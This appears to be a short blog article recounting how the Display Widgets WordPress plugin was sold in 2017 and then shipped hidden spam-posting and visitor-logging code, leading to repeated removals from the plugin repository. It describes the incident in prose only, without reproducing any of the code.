There are not a few people who are trying to take advantage of other websites in order to send out spam. Hiding malicious code inside their plugins, downloading extra “necessary” assets for the plugin to run and so on.So is the case with Display Widgets a WordPress plugin that has more than 200.000 active installs, according to wordpress.org.
So, what did really happen?On May 19 2017, after a long thread of negotiations the plugin has been sold to a man named Mason Soiza for the fair amount of $15.000. It is not clear if his pure intentions were to buy the plugin in order to use it as a backdoor to the 200.000 websites that were using it, but this is what happened. On June 22th a SEO consultant named David Law, informed the WordPress team that the plugin was downloading additional code from an external server. Such cases are not allowed for plugins on the WordPress repository, so the next day, June 23th the plugin was removed from the WordPress repository. On June 30, the second release of the plugin under the new ownership and the first to include the malicious coude was published on the WordPress repository. This code allowed the owner of the plugin, Soiza, to publish spam content to the infected websites. What’s best, the malicious content was entirely hidden for logged in users. This means that there was 99% chance that the website owners had no idea about what was happening on their website. It was David Law again who found that the plugin is logging visits to each website to an external server and reported it to the WordPress team. It is noteworthy that no one found the hidden malicious code yet. The plugin was removed from the repository for the second time. The plugin was been revisioned and reuploaded to the repository on July 6th with the malicious code still there and unnoticed. The logging code has been tweaked with an on/ off switch, which was off by default. More than two weeks later, on July 23rd, Calvin Ngan opened a Trac issue on WordPress.org reporting that Display Widgets was posting spam on his website. He found that the malicious code is in a file named geolocation.php. Once again, the plugin had been removed from the repository. The plugin has been uploaded again, on September 2nd with the malicious code still there. It has also been fixed since there was a minor bug in the malicious code! The plugin has been deleted from the repository on September 8th for the fourth time. Which could actually be considered a record! In the meantime, the original author of the plugin, posted on Twitter in order to warn people about the incident.
We don't have a way of contacting users of our old Display Widgets plugin. But if you are using it you should uninstall immediately.— Formidable Forms (@FormidableForms) September 12, 2017